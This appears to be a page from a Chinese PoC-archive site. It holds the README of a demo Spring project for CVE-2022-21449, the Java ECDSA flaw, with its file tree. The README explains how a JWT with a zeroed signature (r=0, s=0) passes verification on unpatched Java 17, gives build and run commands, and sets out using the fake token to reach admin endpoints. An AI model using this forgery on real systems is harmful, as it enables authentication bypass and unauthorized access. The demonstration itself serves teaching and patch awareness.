关联漏洞
标题:
Oracle Java SE 输入验证错误漏洞
(CVE-2022-21449)
描述:Oracle Java SE是美国甲骨文(Oracle)公司的一款用于开发和部署桌面、服务器以及嵌入设备和实时环境中的Java应用程序。 Oracle Java SE 中存在输入验证错误漏洞,该漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而破坏 Oracle Java SE、Oracle GraalVM 企业版。成功攻击此漏洞可能导致对关键数据或所有 Oracle Java SE、Oracle GraalVM 企业版可访问数据的未经授权的创建、删除或修改访问。
介绍
# Demo Project: CVE-2022-21449 Vulnerability
This project demonstrates the CVE-2022-21449 vulnerability, which affects Java's ECDSA signature verification. The vulnerability allows a malicious actor to bypass signature verification by using a signature with zero values (`r=0` and `s=0`). The project uses real and fake JWT tokens with EC signatures to showcase the issue on Java 17 without the security patch.
## Features
- **Real JWT Token**: A valid JWT token signed with an EC private key.
- **Fake JWT Token**: A JWT token with a zeroed signature (`r=0`, `s=0`).
- **Validation**: Demonstrates how the vulnerability allows the fake token to pass validation.
## Prerequisites
- **Java 17** (without the security patch for CVE-2022-21449).
- **Maven** for building the project.
## Project Structure
- `JwtGenerator`: Generates real and fake JWT tokens.
- `JwtUtils`: Validates JWT tokens using a public EC key.
- `SecurityConfig`: Configures Spring Security to demonstrate token-based authentication.
- `ProtectedController`: Provides endpoints to test token-based access control.
## How to Use the `JwtGenerator` Console App
The `JwtGenerator` class is a standalone console application that generates and prints both valid and fake JWT tokens.
### Steps to Run
1. **Build the Project**:
```bash
mvn clean install
```
2. **Run the `JwtGenerator` Class**:
```bash
mvn exec:java -Dexec.mainClass="com.symphony_solutions.demo.util.JwtGenerator"
```
3. **Output**:
The application will print:
- A valid JWT token.
- A fake JWT token with a zeroed signature.
Example:
```
=== Valid JWT ===
eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJhbGljZSIsInJvbGVzIjpbIkFETUlOIiwiVVNFUiJdLCJpYXQiOjE2NzAwMDAwMDAsImV4cCI6MTY3MDAzNjAwMH0.<signature>
=== Fake JWT with zero signature ===
eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJib2IiLCJyb2xlcyI6WyJBRE1JTiIsIlVTRVIiXSwiaWF0IjoxNjcwMDAwMDAwLCJleHAiOjE2NzAwMzYwMDB9.<zeroed_signature>
```
4. **Use the Tokens**:
- Copy the tokens and use them to test the vulnerability in the application or other tools.
## Demonstrating the Vulnerability
1. **Start the Application**:
```bash
mvn spring-boot:run
```
2. **Access Protected Endpoints**:
- Use a valid token to access `/protected/user` or `/protected/admin`.
- Use the fake token to demonstrate how the vulnerability allows unauthorized access.
3. **Endpoints**:
- `/protected/user`: Requires `USER` or `ADMIN` role.
- `/protected/admin`: Requires `ADMIN` role.
## Important Notes
- This project is for educational purposes only. Do not use it in production environments.
- Ensure your Java version is updated with the security patch to mitigate CVE-2022-21449.
## References
- [CVE-2022-21449 Details](https://nvd.nist.gov/vuln/detail/CVE-2022-21449)
- [Java Security Updates](https://www.oracle.com/security-alerts/)
## License
This project is licensed under the MIT License.
文件快照
[4.0K] /data/pocs/b9dff573116aa51c5ad4a1939401e81e887bc7a9
├── [ 241] ec_private_key.pem
├── [ 178] ec_public_key.pem
├── [3.0K] pom.xml
├── [2.9K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] symphony_solutions
│ └── [4.0K] demo
│ ├── [4.0K] config
│ │ └── [3.1K] SecurityConfig.java
│ ├── [4.0K] controller
│ │ └── [ 493] ProtectedController.java
│ ├── [ 317] DemoApplication.java
│ └── [4.0K] util
│ ├── [4.1K] JwtGenerator.java
│ └── [1.8K] JwtUtils.java
└── [4.0K] resources
├── [ 168] application.yml
├── [ 241] private_key.pem
└── [ 178] public_key.pem
10 directories, 12 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。